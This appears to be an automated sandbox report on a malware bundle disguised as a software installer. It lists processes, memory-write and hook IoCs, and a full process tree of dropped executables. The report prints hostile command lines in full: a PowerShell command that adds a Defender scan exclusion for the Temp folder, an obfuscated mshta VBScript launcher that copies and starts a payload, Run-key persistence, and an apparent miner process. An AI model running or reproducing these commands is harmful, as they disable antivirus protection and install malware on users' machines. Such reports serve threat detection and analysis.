4284  msedge.exe
4004  Mon114917d808c86e0ba.tmp
4616  setup.tmp
232   msedge.exe
1436  setting.exe
3068  installer.exe
7900  Calculator.exe
4376  Settings.exe
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
pid   process
3532  CrowdInspect.sfx.exe
3532  CrowdInspect.sfx.exe
1628  CrowdInspect.exe
1816  CrowdInspect64.exe
4640  CrowdInspect.exe
3908  CrowdInspect.exe
4788  CrowdInspect.exe
4860  CrowdInspect.exe
3512  setup_x86_x64_install.exe
4656  setup_installer.exe
1356  setup_install.exe
852   Mon112c3d79b6fdf8.exe
1416  Mon11991188390d59.exe
4808  Mon114917d808c86e0ba.exe
1248  Mon1190ed9443.exe
1900  Mon1173d8f84c056.exe
5000  postback.exe
4060  Mon11a9d578c6.exe
1220  Mon114917d808c86e0ba.exe
4004  Mon114917d808c86e0ba.tmp
2672  Mon11a22bde2b.exe
5000  postback.exe
4868  inst1.exe
3056  Conhost.exe
408   QPeacnpa5OCyBgRir69RuR8o.exe
3700  WQ_0DNHwegoB5QOHvlIZntSr.exe
3204  Ij6YtsqVdlgwgUz3rMkCp0mj.exe
5196  QPeacnpa5OCyBgRir69RuR8o.exe
5204  GBI_yH9a9U9c0kT8e_JoFRwy.exe
5320  fLt5aaWDMdJHJUJsdaAbuivD.exe
5336  brLy3TAdoOEVkJuOS7U49MCH.exe
1452  Pro.exe
5148  p9IkKDDHEvPP_0EBsFu2v6aq.exe
5484  xWDw4KvnprXoiUalqAVdu3zs.exe
5492  Calculator.exe
5212  wmiprvse.exe
5688  msiexec.exe
5856  4mulY6HX0OKjNh4y5va_iEdo.exe
5904  Conhost.exe
5812  setup.exe
6000  Ij6YtsqVdlgwgUz3rMkCp0mj.exe
6044  cmd.exe
6060  Conhost.exe
5008  setup.tmp
5140  schtasks.exe
5076  WMIADAP.EXE
2964  setup_2.exe
1448  cutm3.exe
2476  setup.exe
4404  extd.exe
4616  setup.tmp
852   inst3.exe
5564  ZNjEhM7gVrAAxuwEiyqOJ34t.exe
6280  powershell.exe
6916  timeout.exe
6268  extd.exe
6920  postback.exe
5560  AppLaunch.exe
6980  cmd.exe
3928  LzmwAqmV.exe
3764  EASS.exe
3500  tDQQVMK4kh5kC_VXdu6mwGw2.exe
2868  As_7_fJ9jiliYff_bkd0HLSb.exe
3720  powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                       pid   process             target process
PID 1628 wrote to memory of 1816  1628  CrowdInspect.exe    CrowdInspect64.exe
PID 1628 wrote to memory of 1816  1628  CrowdInspect.exe    CrowdInspect64.exe
PID 1816 wrote to memory of 4284  1816  CrowdInspect64.exe  msedge.exe
PID 1816 wrote to memory of 4284  1816  CrowdInspect64.exe  msedge.exe
PID 4284 wrote to memory of 3980  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3980  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 2532  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 4024  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 4024  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
PID 4284 wrote to memory of 3716  4284  msedge.exe          msedge.exe
Processes (indented by tree depth; each entry shows the image path, then its command line, then the signatures it triggered)

C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe"
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\Upfc.exe
  cmd: C:\Windows\System32\Upfc.exe /launchtype periodic /cv I50SDwAzrk2EvCFYy6B5rQ.0

C:\Windows\System32\sihclient.exe
  cmd: C:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.2
  - Modifies data under HKEY_USERS

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  - Modifies data under HKEY_USERS

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Users\Admin\Desktop\CrowdInspect.exe
  cmd: "C:\Users\Admin\Desktop\CrowdInspect.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\Desktop\CrowdInspect64.exe
    cmd: "C:\Users\Admin\Desktop\CrowdInspect64.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.crowdstrike.com/inspect/replaceav
      - Adds Run key to start application
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\CrowdInspect.exe
  cmd: "C:\Users\Admin\Desktop\CrowdInspect.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\Desktop\CrowdInspect.exe
  cmd: "C:\Users\Admin\Desktop\CrowdInspect.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\Desktop\CrowdInspect.exe
  cmd: "C:\Users\Admin\Desktop\CrowdInspect.exe"
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\Desktop\CrowdInspect.exe
  cmd: "C:\Users\Admin\Desktop\CrowdInspect.exe"
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
C:\Users\Admin\Desktop\setup_x86_x64_install.exe
  cmd: "C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

  C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

    C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetWindowsHookEx

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon11b7ab2df056a.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exe
          cmd: Mon11b7ab2df056a.exe
          - Executes dropped EXE

          C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exe
            - Executes dropped EXE

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon114917d808c86e0ba.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe
          cmd: Mon114917d808c86e0ba.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx

          C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp
            cmd: "C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp" /SL5="$700C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe"

            C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT
              - Executes dropped EXE
              - Suspicious use of SetWindowsHookEx

              C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp
                cmd: "C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious use of FindShellTrayWindow
                - Suspicious use of SetWindowsHookEx

                C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe" ss1
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Suspicious use of SetWindowsHookEx

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon112c3d79b6fdf8.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon112c3d79b6fdf8.exe
          cmd: Mon112c3d79b6fdf8.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx

          C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 284
            - Program crash

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon11bc113a5813.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exe
          cmd: Mon11bc113a5813.exe
          - Executes dropped EXE
          - Suspicious use of SetThreadContext

          C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exe

            C:\Windows\SysWOW64\WerFault.exe
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 28
              - Drops file in Windows directory
              - Program crash
              - Checks processor information in registry
              - Enumerates system info in registry
      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon11991188390d59.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11991188390d59.exe
          cmd: Mon11991188390d59.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx

          C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 284
            - Program crash

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon1190ed9443.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exe
          cmd: Mon1190ed9443.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx

          C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 1912
            - Program crash

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon11f55cde4ec30.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exe
          cmd: Mon11f55cde4ec30.exe
          - Executes dropped EXE

          C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exe

            C:\Users\Admin\AppData\Local\Temp\mminer.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\mminer.exe"

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon1173d8f84c056.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1173d8f84c056.exe
          cmd: Mon1173d8f84c056.exe
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx

      C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c Mon110c83ac9fca39.exe

        C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon110c83ac9fca39.exe
          cmd: Mon110c83ac9fca39.exe
          - Executes dropped EXE

          C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe
            cmd: "C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"
            - Executes dropped EXE

          C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe
            cmd: "C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx

          C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe
            cmd: "C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx

            C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe
              cmd: "C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe"

              C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Checks processor information in registry
                - Suspicious use of SetWindowsHookEx

              C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe" /mixtwo
                - Executes dropped EXE
                - Suspicious use of SetWindowsHookEx

                C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 288
                  - Executes dropped EXE
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry
              C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe"

              C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe"

                C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 276
                  - Program crash
                  - Checks processor information in registry
                  - Enumerates system info in registry

              C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe"

              C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"

                C:\Windows\SysWOW64\mshta.exe
                  cmd: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

                  C:\Windows\SysWOW64\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ) do taskkill -f -iM "%~NxM"

                    C:\Windows\SysWOW64\taskkill.exe
                      cmd: taskkill -f -iM "xjoDIB1cgkY5rhQ62iKlOsJ7.exe"
                      - Kills process with taskkill

              C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe"
                - Loads dropped DLL

                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                  cmd: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                  - Loads dropped DLL
                  - Adds Run key to start application

                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                    cmd: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"

                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                      cmd: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee0

                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                        cmd: C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e90
                        - Executes dropped EXE
                        - Suspicious use of SetWindowsHookEx

                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                      cmd: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,14913646324800417076,7703059395117259456,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2916_1239287217" --mojo-platform-channel-handle=1740 /prefetch:8

              C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"

                C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp
                  cmd: "C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp" /SL5="$40484,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"
                  - Loads dropped DLL

                  C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe
                    cmd: "C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe" /S /UID=2709
                    - Drops file in Drivers directory
                    - Adds Run key to start application

                    C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe
                      cmd: "C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe" /VERYSILENT

                    C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe
                      cmd: "C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe"

                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                        - Adds Run key to start application
                        - Checks processor information in registry
                        - Enumerates system info in registry
                        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        - Suspicious use of FindShellTrayWindow
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:213⤵
-
